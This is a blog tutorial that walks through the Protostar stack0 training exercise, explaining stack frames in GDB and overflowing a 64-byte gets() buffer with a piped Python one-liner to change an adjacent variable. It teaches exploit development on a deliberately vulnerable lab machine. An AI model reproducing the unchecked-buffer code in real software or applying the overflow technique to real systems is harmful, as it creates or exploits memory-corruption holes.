Jun 22, 2020

Protostar Stack0 walkthrough

Hello there. In this tutorial we are going to learn Linux exploit development. We use the Protostar Linux machine for this purpose. Protostar was developed by exploit-exercises.com. Unfortunately, the host site is now down, but you can still find the ISO file on the internet. Just google it. Download it first, then boot it with VirtualBox or VMware as the virtualization software.

Introduction to Protostar

As the first step, boot Protostar and log in as root. The default username/password is "root:godmode". After logging in as root, use ifconfig to get the IP address of the machine.

Now you can use SSH on Linux, or PuTTY, to access our victim machine. This time you have to log in as the normal user. The default credentials are "user:user".

protostar-login-interface

There is one more thing to do before you actually start learning. Change your shell to bash by entering bash, because bash gives you more power than the default sh shell.

Now the interesting part begins. All of the challenges are located inside "/opt/protostar/bin".

So use cd && ls

cd /opt/protostar/bin && ls

There are 25 levels to play which can be divided into the following main categories.

  • Stack-based buffer overflows
  • Heap-based buffer overflows
  • Format string Exploits

protostar-list-all-binaries

The easiest part to understand is the stack-based exploits. Even if you are new to exploit development, you can understand what's going on. The first level you want to try is stack0. It will teach you how function calls happen, how stack frames are built, and how to overflow data outside of an allocated buffer.

Take a look at the stack0 binary

Let's see what we have to do.

./stack0

Just enter a string and see what happens.

It tells us to try again. :-(

user@protostar:/opt/protostar/bin$ ./stack0
hello
Try again?

We are given the source code as well. It doesn't help a lot on its own, but read it to get an idea of what is happening.

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
int main(int argc,char **argv){

  volatile int modified;
  char buffer[64];
  modified=0;
  gets(buffer);
  if(modified!=0){
    printf("you have changed the 'modified' variable\n");
  }
  else
  {
    printf("Try again?\n");
  }
}

First, it declares two variables called 'modified' and 'buffer'. The size of the buffer is 64 bytes. Then it sets 'modified' to zero, reads a line from the user with gets(), and copies it into the buffer. This code doesn't do any kind of bounds checking before copying data into the buffer: gets() keeps writing until it sees a newline, so it doesn't care if the supplied string is larger than the buffer. Buffer overflows occur in exactly this situation.

Did you notice something special in the declaration of the 'modified' integer? Why is there a volatile keyword? First, we assign zero to 'modified'. Nothing in the code changes it afterwards, and yet there is an if-statement that checks whether it is still zero. What a joke here. :-) When the compiler sees this, it may decide that the check can never be true and optimize the if-statement away. That's why the 'volatile' keyword is used in the above code. It tells the compiler, 'Hey GCC, don't make assumptions about this integer. It may change at run time :-)'
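To make the missing bounds check concrete, here is a small Python model. It is only a sketch, not the real C runtime: it assumes 'modified' sits directly after the 64-byte buffer (the disassembly later in this post confirms that distance for this binary), and the names new_frame, unchecked_copy, bounded_copy and modified are made up for illustration.

```python
import struct

BUF_SIZE = 64  # size of 'buffer' in the C source


def new_frame():
    # Assumed layout: 64 bytes of buffer, then the 4-byte 'modified' int (zeroed),
    # then a few spare bytes so the model itself never runs out of room.
    return bytearray(BUF_SIZE + 4 + 12)


def unchecked_copy(frame, data):
    # Like gets(): store every input byte plus a NUL, never looking at BUF_SIZE.
    for i, byte in enumerate(data + b"\x00"):
        frame[i] = byte
    return frame


def bounded_copy(frame, data):
    # Like fgets(buffer, sizeof buffer, stdin): at most 63 bytes plus a NUL.
    kept = data[:BUF_SIZE - 1]
    for i, byte in enumerate(kept + b"\x00"):
        frame[i] = byte
    return frame


def modified(frame):
    # Read the little-endian int that sits right after the buffer.
    return struct.unpack_from("<i", frame, BUF_SIZE)[0]


print(modified(unchecked_copy(new_frame(), b"A" * 64)))  # 0
print(modified(unchecked_copy(new_frame(), b"A" * 65)))  # 65, i.e. 0x41
print(modified(bounded_copy(new_frame(), b"A" * 65)))    # 0
```

With the unchecked copy, the 65th byte is the first one that spills out of the buffer. The bounded version simply drops the extra input.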

Disassembling the binary

Now it's time to disassemble the binary and see its inner workings. We use GDB for this. Let me introduce you to our awesome tool GDB. It's short for GNU Debugger. By using a debugger, we can see how things happen at the machine code level. As you can see below, I have used Intel syntax for the assembly.

set disassembly-flavor intel

The reason to use Intel assembly syntax is that it's clean, user friendly, and easy to understand.

As the next step, I disassembled the main function. 

(gdb) disass  main
Dump of assembler code for function main:
0x080483f4 <main+0>:    push   ebp
0x080483f5 <main+1>:    mov    ebp,esp
0x080483f7 <main+3>:    and    esp,0xfffffff0
0x080483fa <main+6>:    sub    esp,0x60
0x080483fd <main+9>:    mov    DWORD PTR [esp+0x5c],0x0
0x08048405 <main+17>:   lea    eax,[esp+0x1c]
0x08048409 <main+21>:   mov    DWORD PTR [esp],eax
0x0804840c <main+24>:   call   0x804830c <gets@plt>
0x08048411 <main+29>:   mov    eax,DWORD PTR [esp+0x5c]
0x08048415 <main+33>:   test   eax,eax
0x08048417 <main+35>:   je     0x8048427 <main+51>
0x08048419 <main+37>:   mov    DWORD PTR [esp],0x8048500
0x08048420 <main+44>:   call   0x804832c <puts@plt>
0x08048425 <main+49>:   jmp    0x8048433 <main+63>
0x08048427 <main+51>:   mov    DWORD PTR [esp],0x8048529
0x0804842e <main+58>:   call   0x804832c <puts@plt>
0x08048433 <main+63>:   leave
0x08048434 <main+64>:   ret
End of assembler dump.

The hexadecimal values on the left-hand side are memory addresses. Our assembly instructions are stored at these locations. Computer memory is divided into small units called bytes. One byte is equal to 8 bits, and 1 bit can hold zero or one, so 8 bits can hold 256 different values. Their range is 0 to 255 in decimal. On this 32-bit machine we normally work with 4-byte words.

A CPU has 5 main components for processing instructions.
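The numbers above are easy to check in Python. This is only a quick sketch. The byte order shown (least significant byte first, "little-endian") is how x86 stores a 4-byte word in memory, a detail the text above does not cover.

```python
import struct

BITS_PER_BYTE = 8

values_per_byte = 2 ** BITS_PER_BYTE
print(values_per_byte)       # 256 different values
print(values_per_byte - 1)   # 255 is the largest one, so the range is 0..255

# A 4-byte word: the address of main from the disassembly above.
word = 0x080483f4
raw = struct.pack("<I", word)  # "<I" = little-endian unsigned 32-bit
print(len(raw))    # 4
print(raw.hex())   # f4830408
```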

  • Data bus
  • Instruction Decoder
  • Program counter
  • Arithmetic and logic unit (ALU)
  • Registers

The program counter keeps track of which instruction should be processed now and which is next to be executed. On x86 this job is done by the EIP register, which always holds the memory address of the next instruction to execute. Now the CPU knows the memory address of the instruction, so it fetches whatever is found at that address and gives it to the instruction decoder. The instructions fetched from memory are called opcodes, and each has its own meaning. The opcode for pop edi is 5f, while the opcode for inc ebp is 45. The duty of the instruction decoder is to find out what to do from these opcodes. If it sees opcode 5f, it tells the CPU to 'pop the value at the top of the stack (the one ESP points to) into EDI'. As the final step, the needed data comes through the data bus and is processed in the ALU. After that, the processed data is saved in memory or registers. OK, I hope you understood what's going on here.

Actually, instructions like push ebp / mov ebp, esp do not come from the body of the main function. They are added by the compiler to build a stack frame for the function. Let me quickly introduce you to the term stack.

The stack is a concept used in computer science. In programs, we use functions to make things easy and clear. In languages like C and Python, we supply arguments to a function, and the function returns some data too. So how is this possible? This is where the stack comes into play. We use the stack to pass function arguments. The stack always begins at high memory and grows toward low memory. We can add something to the stack with the push instruction and remove it with the pop instruction. The ESP register always points to the top of the stack.

In the following code snippet, you can see that I have created a breakpoint at the very first instruction of the main function. For that, I used break *0x80483f4. You may ask, 'Why didn't you use break main?' Well, if we use break main, the debugger skips the function prologue and stops at the first line of main's own code, because it knows the prologue comes from the compiler. Since we want to see how the stack is built, we set the breakpoint like this.
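The fetch and decode steps can be sketched as a tiny loop. This is a toy model, not how a real decoder is built: it only knows a handful of one-byte 32-bit x86 opcodes. 5f and 45 are the ones mentioned above. 55 (push ebp), c9 (leave) and c3 (ret) are added here because they show up in main's prologue and epilogue. The names OPCODES and run are hypothetical.

```python
# One-byte opcodes (32-bit x86) and their mnemonics.
OPCODES = {
    0x55: "push ebp",
    0x45: "inc ebp",
    0x5f: "pop edi",
    0xc9: "leave",
    0xc3: "ret",
}


def run(code, eip=0):
    """Walk over 'code', returning (address, mnemonic) pairs."""
    trace = []
    while eip < len(code):
        opcode = code[eip]                         # fetch the byte EIP points to
        mnemonic = OPCODES.get(opcode, "unknown")  # decode it
        trace.append((eip, mnemonic))
        eip += 1                                   # every opcode here is 1 byte long
        if mnemonic == "ret":
            break                                  # stop at the end of the function
    return trace


for address, mnemonic in run(bytes([0x55, 0x45, 0x5f, 0xc3])):
    print(address, mnemonic)
```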
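Here is a minimal Python sketch of that behaviour. The class name Stack and the starting address 0x1000 are made up for the example. The point is only that push moves ESP down by 4 bytes and pop moves it back up.

```python
class Stack:
    """Toy model of a 32-bit stack that grows toward low memory."""

    def __init__(self, esp):
        self.esp = esp      # address of the current top of the stack
        self.memory = {}    # address -> 32-bit value

    def push(self, value):
        self.esp -= 4                            # make room first (stack grows down)
        self.memory[self.esp] = value & 0xffffffff

    def pop(self):
        value = self.memory[self.esp]            # read the word ESP points to
        self.esp += 4                            # then release the slot
        return value


stack = Stack(esp=0x1000)
stack.push(0x11111111)
stack.push(0x22222222)
print(hex(stack.esp))    # 0xff8, two pushes lowered ESP by 8
print(hex(stack.pop()))  # 0x22222222, last in, first out
print(hex(stack.esp))    # 0xffc
```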

(gdb) b *0x080483f4
Breakpoint 1 at 0x80483f4: file stack0/stack0.c, line 6.
(gdb) run
Starting program: /opt/protostar/bin/stack0

Breakpoint 1, main (argc=1, argv=0xbffff864) at stack0/stack0.c:6

Next, we use the command i r to see what's inside the registers. This is the short form of info registers.

(gdb) i r
eax            0xbffff864       -1073743772
ecx            0x9b28c042       -1691828158
edx            0x1      1
ebx            0xb7fd7ff4       -1208123404
esp            0xbffff7bc       0xbffff7bc
ebp            0xbffff838       0xbffff838
esi            0x0      0
edi            0x0      0
eip            0x80483f4        0x80483f4
eflags         0x200246 [ PF ZF IF ID ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
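For general registers like eax and ecx, the last column is the same 32-bit value shown as a signed decimal number, which is why it looks negative. A short sketch of the conversion (the helper name to_signed32 is made up):

```python
def to_signed32(value):
    # If the top bit is set, the value is negative in two's complement.
    return value - (1 << 32) if value & 0x80000000 else value


print(to_signed32(0xbffff864))  # -1073743772, matches eax above
print(to_signed32(0x9b28c042))  # -1691828158, matches ecx above
print(to_signed32(0x1))         # 1, matches edx above
```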

Note that EIP is pointing to the address 0x80483f4. Do you remember it? It is the address of the first instruction in the disassembly above. EIP contains that value because the next instruction waiting to execute is there.

We have stopped execution at the start of the code. Following is a graphical view of the stack. You can see that right now there is something on the top of the stack called ret. So what is it? It is the return address: after main finishes, the CPU has to go to that address and execute whatever instruction is found there.

Saved return address in the stack

We can examine the stack in GDB too. Let's see how. The command for examining memory in hexadecimal is below.

Get ready to the extraction

What if I want to examine multiple words that begin from an address? We can do it this way.

(gdb) x/30x $esp
0xbffff7bc:     0xb7eadc76      0x00000001      0xbffff864      0xbffff86c
0xbffff7cc:     0xb7fe1848      0xbffff820      0xffffffff      0xb7ffeff4
0xbffff7dc:     0x0804824b      0x00000001      0xbffff820      0xb7ff0626
0xbffff7ec:     0xb7fffab0      0xb7fe1b28      0xb7fd7ff4      0x00000000
0xbffff7fc:     0x00000000      0xbffff838      0xb17f3652      0x9b28c042
0xbffff80c:     0x00000000      0x00000000      0x00000000      0x00000001
0xbffff81c:     0x08048340      0x00000000      0xb7ff6210      0xb7eadb9b
0xbffff82c:     0xb7ffeff4      0x00000001

In the above output, you can see the return address (0xb7eadc76) as the first word, at the top of the stack where ESP points. Remember that the top of the stack is at the low memory addresses.

The next instruction is push ebp. So in theory, the value of the EBP register should be copied to the top of the stack after this instruction. Let's see if this is true.

(gdb) ni
0x080483f5      6       in stack0/stack0.c
(gdb) x/30x $esp
0xbffff7b8:     0xbffff838      0xb7eadc76      0x00000001      0xbffff864
0xbffff7c8:     0xbffff86c      0xb7fe1848      0xbffff820      0xffffffff
0xbffff7d8:     0xb7ffeff4      0x0804824b      0x00000001      0xbffff820
0xbffff7e8:     0xb7ff0626      0xb7fffab0      0xb7fe1b28      0xb7fd7ff4
0xbffff7f8:     0x00000000      0x00000000      0xbffff838      0xb17f3652
0xbffff808:     0x9b28c042      0x00000000      0x00000000      0x00000000
0xbffff818:     0x00000001      0x08048340      0x00000000      0xb7ff6210
0xbffff828:     0xb7eadb9b      0xb7ffeff4

You can see that a new value has been copied to the stack, and it's 0xbffff838 (the first word in the output above). This is nothing but the value of EBP. :-) Another thing happened: ESP changed from 0xbffff7bc to 0xbffff7b8. Calculate the difference between them in your head. It is 4. Yes, the size of a register is 4 bytes, so ESP was reduced by 4 bytes. Wait, why is ESP reduced when we push data onto the stack? This is because the stack grows toward low memory. If something is pushed onto the stack, ESP is reduced. If we pop off the stack, ESP goes higher. Anyway, right now the stack looks like this.

Push ebp in protostar stack0

The next instruction to execute is mov ebp, esp. So the value of ESP should be copied to EBP. Now both the ESP and EBP registers point to the top of the stack like this.

Protostar stack 0 mov ebp esp

Let's see this situation in GDB.

(gdb) i r esp ebp
esp            0xbffff7b8       0xbffff7b8
ebp            0xbffff838       0xbffff838
(gdb) ni
0x080483f7      6       in stack0/stack0.c
(gdb) i r esp ebp
esp            0xbffff7b8       0xbffff7b8
ebp            0xbffff7b8       0xbffff7b8

I have used another GDB command here called ni. It is short for nexti ('next instruction'). The name says it all: it simply executes the next instruction. Also, in the above output, you can see that ESP has not changed. We did not push or pop anything, so ESP stays at its current location.

Next, there is and esp, 0xfffffff0. This instruction aligns the stack to a 16-byte boundary by clearing the lowest four bits of ESP, and we don't need to care much about it. However, ESP changes like this (it goes to a lower address): in this run from 0xbffff7b8 to 0xbffff7b0.

Protostar stack0 and esp

The next instruction is sub esp, 0x60, so ESP is reduced by 96 bytes. Where does 96 come from? 0x60 in hex is 96 in decimal. This is how space for local variables is allocated on the stack.

Protostar stack0 sub esp

We can see this on GDB too.

(gdb) i r esp
esp            0xbffff7b0       0xbffff7b0
(gdb) ni
10      in stack0/stack0.c
(gdb) i r esp
esp            0xbffff750       0xbffff750

0xbffff7b0 - 0xbffff750 = 0x60 ==> 96 Bytes in decimal . 
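The whole prologue can be replayed with plain arithmetic. This sketch starts from the register values seen at the breakpoint (ESP = 0xbffff7bc, EBP = 0xbffff838) and applies the four instructions one by one. The function name prologue is made up, and the addresses are only valid for this particular run.

```python
def prologue(esp, ebp):
    """Replay main's first four instructions on ESP/EBP only."""
    steps = []

    esp -= 4                      # push ebp: make room, old EBP is stored at [esp]
    steps.append(("push ebp", esp, ebp))

    ebp = esp                     # mov ebp,esp
    steps.append(("mov ebp,esp", esp, ebp))

    esp &= 0xfffffff0             # and esp,0xfffffff0: round down to 16 bytes
    steps.append(("and esp,0xfffffff0", esp, ebp))

    esp -= 0x60                   # sub esp,0x60: reserve 96 bytes for locals
    steps.append(("sub esp,0x60", esp, ebp))

    return steps


for name, esp, ebp in prologue(0xbffff7bc, 0xbffff838):
    print(f"{name:20} esp={esp:#x} ebp={ebp:#x}")
```

The last line printed shows esp=0xbffff750 and ebp=0xbffff7b8, the same values GDB reports.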

OK. Let's see what's next.

mov DWORD PTR [esp + 0x5c], 0x0

This instruction takes the address esp + 0x5c and writes a zero to it. Since 0x5c is 92 in decimal and ESP is 0xbffff750, the zero goes to 0xbffff7ac. That is the last 4-byte slot of the 96 bytes we just reserved, 12 bytes below the saved EBP at 0xbffff7b8 in this run.

 

Protostar stack0 saved zero value on the stack

 

Can you guess what this line of code actually does? In our C source code, there was an int variable that was set to zero. This is that value. :-)

(gdb) x/30x $esp
0xbffff750:     0x00000000      0x00000001      0xb7fff8f8      0xb7f0186e
0xbffff760:     0xb7fd7ff4      0xb7ec6165      0xbffff778      0xb7eada75
0xbffff770:     0xb7fd7ff4      0x08049620      0xbffff788      0x080482e8
0xbffff780:     0xb7ff1040      0x08049620      0xbffff7b8      0x08048469
0xbffff790:     0xb7fd8304      0xb7fd7ff4      0x08048450      0xbffff7b8
0xbffff7a0:     0xb7ec6365      0xb7ff1040      0x0804845b      0xb7fd7ff4
0xbffff7b0:     0x08048450      0x00000000      0xbffff838      0xb7eadc76
0xbffff7c0:     0x00000001      0xbffff864
(gdb) x/i $eip
0x80483fd <main+9>:     mov    DWORD PTR [esp+0x5c],0x0
(gdb) ni
11      in stack0/stack0.c
(gdb) x/30x $esp
0xbffff750:     0x00000000      0x00000001      0xb7fff8f8      0xb7f0186e
0xbffff760:     0xb7fd7ff4      0xb7ec6165      0xbffff778      0xb7eada75
0xbffff770:     0xb7fd7ff4      0x08049620      0xbffff788      0x080482e8
0xbffff780:     0xb7ff1040      0x08049620      0xbffff7b8      0x08048469
0xbffff790:     0xb7fd8304      0xb7fd7ff4      0x08048450      0xbffff7b8
0xbffff7a0:     0xb7ec6365      0xb7ff1040      0x0804845b      0x00000000
0xbffff7b0:     0x08048450      0x00000000      0xbffff838      0xb7eadc76
0xbffff7c0:     0x00000001      0xbffff864

The next instruction is:

lea eax , [esp + 0x1c]

lea stands for Load Effective Address. It computes the address esp + 0x1c (esp + 28 in decimal) and stores that address in EAX, without reading the memory there.

(gdb) i r eax
eax            0xbffff864       -1073743772
(gdb) x/i $eip
0x8048405 <main+17>:    lea    eax,[esp+0x1c]
(gdb) ni
0x08048409      11      in stack0/stack0.c
(gdb) i r eax
eax            0xbffff76c       -1073744020
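The difference between lea and a normal mov load is easy to miss, so here is a small sketch of it. The dictionary memory holds just one word, the one that the dump above shows at 0xbffff76c before gets runs. The helper names lea and mov_load are made up.

```python
# One word of "memory": the value at 0xbffff76c in the dump above.
memory = {0xbffff76c: 0xb7eada75}


def lea(base, offset):
    # lea only does the address arithmetic, it never touches memory.
    return (base + offset) & 0xffffffff


def mov_load(mem, base, offset):
    # mov reg,[base+offset] computes the same address, then reads from it.
    return mem[(base + offset) & 0xffffffff]


esp = 0xbffff750
print(hex(lea(esp, 0x1c)))               # 0xbffff76c, what EAX holds after lea
print(hex(mov_load(memory, esp, 0x1c)))  # 0xb7eada75, what a mov would have loaded
```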

After that, whatever is in EAX is written to the top of the stack (mov DWORD PTR [esp], eax). What did these two instructions do together? They placed an address on the stack. But why? This is the argument for the next function. The next thing to do is the call to the gets function, and its argument, the address of the buffer, is now on the stack. When gets is called, it writes the input data to that memory address.

protostar stack0 bufer space

Let's see what happens when the gets function writes input data to the buffer on the stack. Now I enter some As as the input string.

You can clearly see that our input is copied onto the stack.

(gdb) x/30x $esp
0xbffff750:     0xbffff76c      0x00000001      0xb7fff8f8      0xb7f0186e
0xbffff760:     0xb7fd7ff4      0xb7ec6165      0xbffff778      0xb7eada75
0xbffff770:     0xb7fd7ff4      0x08049620      0xbffff788      0x080482e8
0xbffff780:     0xb7ff1040      0x08049620      0xbffff7b8      0x08048469
0xbffff790:     0xb7fd8304      0xb7fd7ff4      0x08048450      0xbffff7b8
0xbffff7a0:     0xb7ec6365      0xb7ff1040      0x0804845b      0x00000000
0xbffff7b0:     0x08048450      0x00000000      0xbffff838      0xb7eadc76
0xbffff7c0:     0x00000001      0xbffff864
(gdb) x/i $eip
0x804840c <main+24>:    call   0x804830c <gets@plt>
(gdb) ni
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
13      in stack0/stack0.c
(gdb) x/30x $esp
0xbffff750:     0xbffff76c      0x00000001      0xb7fff8f8      0xb7f0186e
0xbffff760:     0xb7fd7ff4      0xb7ec6165      0xbffff778      0x41414141
0xbffff770:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff780:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff790:     0x41414141      0x41414141      0x08004141      0xbffff7b8
0xbffff7a0:     0xb7ec6365      0xb7ff1040      0x0804845b      0x00000000
0xbffff7b0:     0x08048450      0x00000000      0xbffff838      0xb7eadc76
0xbffff7c0:     0x00000001      0xbffff864
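The words in the dump can be turned back into the typed string. The sketch below takes the twelve words starting at 0xbffff76c from the second dump (eleven times 0x41414141, then 0x08004141) and packs them in little-endian order, the way x86 keeps them in memory.

```python
import struct

# Words at 0xbffff76c .. 0xbffff798 after gets() returned (from the dump above).
words = [0x41414141] * 11 + [0x08004141]

# Rebuild the raw bytes as they lie in memory (lowest address first).
raw = b"".join(struct.pack("<I", word) for word in words)

text = raw.split(b"\x00")[0]   # a C string ends at the first NUL byte
print(text.decode())           # the As that were typed
print(len(text))               # 46
print(raw[-4:].hex())          # 41410008
```

The last word is interesting: 41 41 are the final two As, 00 is the terminating NUL written by gets, and 08 is left over from the old value 0x08048450 that was there before.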

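What if I enter a larger number of As? It will overflow into our earlier value (the 'modified' integer). How much data is needed to reach that integer? The buffer starts at esp + 0x1c and 'modified' lives at esp + 0x5c, so they are 0x40 = 64 bytes apart, exactly the size of the buffer. If I enter 65 As, the 65th one lands in 'modified' and it gets changed.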
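The required length can be worked out from the two offsets in the disassembly. This is just that arithmetic written down. The ESP value is the one from this GDB session and may differ on another run, but the distance between the two variables does not depend on it.

```python
ESP = 0xbffff750          # ESP after the prologue in the session above
BUFFER_OFFSET = 0x1c      # from: lea eax,[esp+0x1c]
MODIFIED_OFFSET = 0x5c    # from: mov DWORD PTR [esp+0x5c],0x0

buffer_addr = ESP + BUFFER_OFFSET
modified_addr = ESP + MODIFIED_OFFSET
distance = modified_addr - buffer_addr

print(hex(buffer_addr))    # 0xbffff76c, start of 'buffer'
print(hex(modified_addr))  # 0xbffff7ac, address of 'modified'
print(distance)            # 64 bytes fit before 'modified' is touched
print(distance + 1)        # 65 is the shortest input that changes it
```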

protostar stack0 overwrite buffer

Now everything is clear. It's time for exploitation. We can use the lovely <3 Python for this.

If I enter python -c "print '\x41' * 65" in a shell, I get 65 As printed. So I can pipe this command's output into the stack0 program as its input, like this.

user@protostar:/opt/protostar/bin$ python -c "print '\x41'*65" | ./stack0
you have changed the 'modified' variable
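The same thing can be written as a small script instead of a one-liner. This is only a sketch and it makes some assumptions: it needs Python 3.5 or newer for subprocess.run, while the one-liner above uses Python 2 syntax, so this version is meant for a machine with a newer Python that also has the stack0 binary at the path in TARGET. The names build_payload and run_target are made up.

```python
import os
import subprocess

TARGET = "/opt/protostar/bin/stack0"  # assumed location of the binary


def build_payload(buffer_size=64, fill=b"A"):
    # One byte more than the buffer holds, plus the newline that ends gets().
    return fill * (buffer_size + 1) + b"\n"


def run_target(path=TARGET):
    # Feed the payload to the program on stdin and return what it prints.
    if not os.path.exists(path):
        return None  # binary not available on this machine
    result = subprocess.run([path], input=build_payload(), stdout=subprocess.PIPE)
    return result.stdout.decode()


if __name__ == "__main__":
    output = run_target()
    print(output if output is not None else "stack0 not found at " + TARGET)
```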

Awesome, we did it. We successfully modified the value. It was not just one command: we learned all the theory behind it.

Now there is one more thing. What if I enter a much larger input?

We will get a segmentation fault. The real fun begins with this part. We are going to learn more about this topic in future tutorials.

See you again soon. Thank you for reading.
